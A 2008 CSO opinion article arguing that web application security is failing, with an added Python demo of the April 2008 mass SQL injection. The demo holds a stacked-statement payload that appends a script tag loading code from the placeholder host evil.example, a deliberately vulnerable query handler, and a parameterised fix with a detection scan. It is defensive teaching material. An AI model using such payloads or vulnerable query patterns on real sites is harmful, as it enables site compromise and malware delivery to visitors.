Industry View: Web Application Security Today - Are We All Insane?
WhiteHat Security's Jeremiah Grossman believes the current approach to Web application security is the very picture of insanity
By Jeremiah Grossman
July 02, 2008 — CSO —
Seventeen million programmers are churning out an estimated 102 billion new lines of code per year. Add 162 million websites online, with 809,000 using SSL (an indication of valuable data), and the problem becomes apparent. Researchers estimate that roughly one security defect exists per 10,000 lines of code, and that nine out of 10 websites contain one or more serious vulnerabilities. At that defect rate, the new code alone carries about 10.2 million security defects a year; even if only 1 percent of those are exploitable, we are generating 102,000 zero-days per year, and we just don't know where most of them are. Even if 90 percent of the SSL websites contained only a single issue, 728,100 website vulnerabilities are already in circulation, and we don't know where those are, either.
While Web application security was clearly recognized as a big problem several years ago, many organizations were slow to act. Now Web application exposure has reached the crisis stage because criminals have taken notice and made Web applications their primary target. There's an old proverb that explains how to determine whether or not someone is sane. An individual is shown a stream flowing into a pond. He is given a bucket and asked to drain the pond. If he walks to the stream and dams the inflow into the pond, he is considered sane. If he sets about emptying the pond with his bucket without first stopping the inflow, he is considered insane. This is analogous to today's approach to software security, and specifically Web application security: we bail vulnerabilities out of production websites one at a time while new, equally defective code keeps pouring in.
While the data (think credit card and Social Security numbers) held by websites can be highly attractive, so too is the ability to reach the website's unsuspecting users. In what has become an incredibly common attack, cyber criminals penetrate one of a website's many weak spots and silently lace its Web pages with malicious code. When visitors arrive, their Web browser is automatically exploited and their machine loaded with Trojan horses designed to steal passwords, send spam, attack other computers, and more.
In April 2008, a single massive hack infected hundreds of thousands of Web pages using a sophisticated form of blind SQL Injection. Something we thought technically possible turned real, right before our eyes.
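The following Python is an added illustration and is not code from the original article, nor the payload used in the April 2008 incident. On a constructed SQLite database of "articles" it models the mechanics described in the two paragraphs above: a request parameter concatenated straight into SQL, on a stack that accepts stacked statements, lets a single request append a script tag to every stored page (the "lacing" step); the same handler written with a parameterised query rejects the input; and a scan of stored content shows how a site owner would find the injected tags. The table layout, the sample rows, the placeholder host `evil.example`, the `run_stacked` model of a stacked-statement driver and all function names are assumptions made for this example.

```python
import re
import sqlite3

# Constructed payload for the demo. It is NOT the 2008 payload; it only shows the
# shape: a legitimate-looking id followed by a stacked UPDATE that appends a
# <script> tag to every row. evil.example is a placeholder host.
PAYLOAD = (
    "1; UPDATE articles SET body = body || "
    "'<script src=\"http://evil.example/x.js\"></script>'"
)

# Matches <script ... src=URL ...> and captures the URL.
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc=["\']?([^"\'\s>]+)', re.IGNORECASE)


def build_db():
    """Constructed sample site content: two articles in an in-memory SQLite DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello readers"), ("News", "Quarterly results are in")],
    )
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Model (an assumption of this example) of a driver that accepts several
    ';'-separated statements in one call, as the classic ASP + SQL Server stacks
    hit in 2008 did. sqlite3's execute() refuses stacked statements, so the
    model splits them here. Returns the rows of the first statement; the rest
    run only for their side effects."""
    statements = [s for s in sql.split(";") if s.strip()]
    rows = conn.execute(statements[0]).fetchall()
    for extra in statements[1:]:
        conn.execute(extra)
    conn.commit()
    return rows


def fetch_article_vulnerable(conn, article_id):
    # The weak spot: a request parameter concatenated straight into the SQL text.
    sql = "SELECT title, body FROM articles WHERE id = " + article_id
    return run_stacked(conn, sql)


def fetch_article_safe(conn, article_id):
    # Hardened: validate the expected type, then bind the value as a parameter
    # so the driver never interprets it as SQL.
    try:
        ident = int(article_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (ident,)
    ).fetchall()


def find_injected_scripts(conn):
    """Site-owner check: list (id, src) for every stored body carrying a
    <script src=...> tag. Legitimate content in this table never contains one."""
    hits = []
    for row_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        m = SCRIPT_SRC.search(body)
        if m:
            hits.append((row_id, m.group(1)))
    return hits


if __name__ == "__main__":
    conn = build_db()
    print("safe lookup with payload:", fetch_article_safe(conn, PAYLOAD))
    print("vulnerable lookup with payload:", fetch_article_vulnerable(conn, PAYLOAD))
    print("injected scripts found:", find_injected_scripts(conn))
```

The vulnerable handler still returns the requested article, so the site keeps working and nothing looks wrong from the outside; only the stored content has changed, which is why such compromises stayed unnoticed until visitors' browsers started fetching the remote script. The parameterised version returns nothing for the malicious input and leaves the table untouched.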
The problem has gotten so bad that industry sources say most websites hosting malware have themselves been hacked, Google says 1.3 percent of its search queries return malicious content, and Vint Cerf (father of the Internet) estimates that one quarter of all PCs are part of a botnet. Firewalls are not working. Antivirus and anti-spyware are not working, nor are weekly patching, user education, SSL, or "turning off the home computer" as recommended by the FBI cyber-crime website. In what has become an inside joke, every authority says to use these "best practices" despite their ineffectiveness.